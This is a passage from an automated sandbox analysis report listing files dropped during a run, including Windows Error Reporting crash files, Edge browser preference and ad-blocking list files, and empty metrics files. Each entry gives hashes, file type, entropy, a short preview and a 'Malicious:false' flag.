                                                                                                                                                                                                                                                                                              SSDEEP:96:jAFYe3eoqigKJtts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/y:siOvHnttxR0apYKjqzuiF3Z24lO8JO
                                                                                                                                                                                                                                                                                              MD5:FE30E9FC6F15EE44CAFB485300D686C4
                                                                                                                                                                                                                                                                                              SHA1:83B612C3518B05898B86F67D7FEDD456B38041A1
                                                                                                                                                                                                                                                                                              SHA-256:2B3E10358C4267E0380FC78B61517F6AD26F7E4190DDEA73A1E1BD26E96BB8A4
                                                                                                                                                                                                                                                                                              SHA-512:F899323E2F108B54AFDDA7034165A8BB44BA65D21B394852ACE70D733D307DF51D909E01351F8E898DADBFAE0D3EC9BF864D89F17187C2D426D98CE1DBD31B04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.6.0.7.4.8.4.7.1.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.6.0.7.5.3.1.5.9.2.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.d.4.8.2.6.9.-.f.5.e.0.-.4.9.c.6.-.b.a.a.b.-.f.f.5.d.1.6.e.4.2.3.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.7.5.b.3.4.c.-.2.a.4.d.-.4.d.f.5.-.9.d.0.2.-.1.2.7.0.2.6.f.a.2.f.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.6.4.8.-.0.0.0.1.-.0.0.1.4.-.4.7.3.a.-.8.b.b.3.2.a.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9436.tmp.dmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:41:14 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):46718
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.3092694444105664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:5f8wY4FREZeyfrujxNVqz7i7a0YwF0Yw4AhbM6xFeUCVWItXIomt:K51r2YOqqUZNcS
                                                                                                                                                                                                                                                                                              MD5:EFD3A3B8D4A41C3F004E2EFF07F99209
                                                                                                                                                                                                                                                                                              SHA1:D49891A0263D6A7AD02D64E0087853EA4B299337
                                                                                                                                                                                                                                                                                              SHA-256:E98A93D0A5800FF2F1AF1A126E1B42852A857496F12EBFE865AFAC8F0166BD25
                                                                                                                                                                                                                                                                                              SHA-512:80BDFAAFA65840ECE663DDE5B173D3F6A9C24AD98078C8DB2ABA61CA2B532B755BD2C7704468ED738AD838D1315677EB70476C6C9B4736DB4266CA671814ABE3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MDMP..a..... .......:}Xg....................................$...2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T.......H&..7}Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER94A4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8622
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6886384189924306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJT9Pq6Y8BgTvgmfr57vRpDv89biEhfp2m:R6lXJpi6YagTvgmfrFv0iifx
                                                                                                                                                                                                                                                                                              MD5:A7842015E7A53EC25CA72BC45B257696
                                                                                                                                                                                                                                                                                              SHA1:6E07F4D3EF003795B7BFB2B722C2FED8FC676651
                                                                                                                                                                                                                                                                                              SHA-256:4781176479474C25CBF99087040DB7690F485C50E0B418F2937CD193C51709D7
                                                                                                                                                                                                                                                                                              SHA-512:5B344AF548F5D0D3962B919BFB59076B5E8FA24AD40CCF370DB8C3F00FF63AA53B0102BE647C3FD9F8F990D9AE760CD6B018A4C90849D0EB4D4B13D9CACF7E6D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.8.0.0.<./.P.i.

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER94F3.tmp.xml

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4853
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.441655574998517
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsWJg771I999huWpW8VYtYm8M4Jk5LvM6Fpyyq8vU5LvMQaMuNFd:uIjfsI7A9hP7V5JcjMayWsjMQ1u3d
                                                                                                                                                                                                                                                                                              MD5:D26F91C07F7EF03BCC5875A1B96FC05A
                                                                                                                                                                                                                                                                                              SHA1:9C5C83E021BF09718227B8711197BFD240AAB1CF
                                                                                                                                                                                                                                                                                              SHA-256:1D294EEE1C73096C112212AE3DA3B4BE761979493AD9D4CE37D91F51046D5BB2
                                                                                                                                                                                                                                                                                              SHA-512:80E1656571D0BD445DB4D7F3CEC114880859451D783F8500FF5F1F94224F14DE6F80980A98186F233EDCE60347C950266D12CE8744BCF396F7E3134DFDC3A95B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625483" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\020b7303-8344-49bf-9275-2b21851183d8.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0880595982691625
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5d9fchVhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jVzC:cMk1rT8H19fZ6tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:1EA701FCB8AA11D406297FE27429181C
                                                                                                                                                                                                                                                                                              SHA1:3C8523E8D593F8050BBE2D9FE0A0F3860DB9D85A
                                                                                                                                                                                                                                                                                              SHA-256:9D4D4006D36C33A822B4238B16997A4B11AC5276026BE7D7CD6711A204B593A8
                                                                                                                                                                                                                                                                                              SHA-512:CB9EF0FC3BCDE39667D272D9FA1B342B41A6BD64544DFC7B3C8418EFF54BB6C4211E0A9BE65DABBC1C18762B8DB785C709D8E1352EFC32AF28AD7758ACE6CD80
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\07cf6355-789f-4005-b593-ba8def22de7c.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):44616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.09719757233552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBSwuohDO6vP6OBDIvlyv5XTuMTmuK7cGoup1Xl3j0:z/Ps+wsI7ynEy6tIvL7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:7ACFFE5BBE963672BD18F1AE49C56EA1
                                                                                                                                                                                                                                                                                              SHA1:FFF2820BC48B5AF221F94D44DB8E12DC1FD1A56A
                                                                                                                                                                                                                                                                                              SHA-256:501D6FF0F797EB3F9CFB48FE3004CE7D976E09B08193B22F5B09170D0970093E
                                                                                                                                                                                                                                                                                              SHA-512:5F28D56C304B84A5083169C193035199B1BC771CB2EB218B7C973D33DD5E3E98F9CA2F30BEAEF63CF639A9B8306C0D4BE29E35B029548A8531A84EAF04C3261F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\68339274-96ca-4321-a805-943d1fbf19d3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):45714
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088004726204763
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5WofcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8Heof06tIv8s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:D7175A9FA79FC58FD7E1509F0BBEFAAD
                                                                                                                                                                                                                                                                                              SHA1:9A40381545F62CEC951359D8A5F4FC27AEF239EB
                                                                                                                                                                                                                                                                                              SHA-256:4A175CEC4D06A8420F54DE57544AE6BA8BA593F6236B2599A2D7EECDACBA107D
                                                                                                                                                                                                                                                                                              SHA-512:AAA45D223ACC48DA66ADE001FDED5F630E561C6CBF91560F5E4ABCCE5DDF0785F526EE6ABA19D9FA96699DCFBAF918D11C9E1B5800C12422FFED262F3B348CF0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9a95e692-7eee-4e95-9e5f-b94e170e931c.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.096988522185395
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBzwuohDO6vP6OBDIvlqg5WbR6FFScGoup1Xl3jVz6:z/Ps+wsI7yOEd6tIv4chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:C12E2AFAA04764C46F6ECA016617499F
                                                                                                                                                                                                                                                                                              SHA1:D7CC44A9D80BCCE8333BBAFBE47C13F52F2E6586
                                                                                                                                                                                                                                                                                              SHA-256:FDF4B71450010DAFA9D646081F5C054E4E9E2DA223D831677420C70B55CFB587
                                                                                                                                                                                                                                                                                              SHA-512:A5C094ACDC482E070297036DB75DFB1B8178AD6A4F07E9C181DDB9758A401E715FD32633A4F3D345F8DF6E61441A06838630475EDEC5E3482C6E774FC78C0200
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7cfb3ff1-35da-48a7-be77-2ae1a2e7dbbd.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
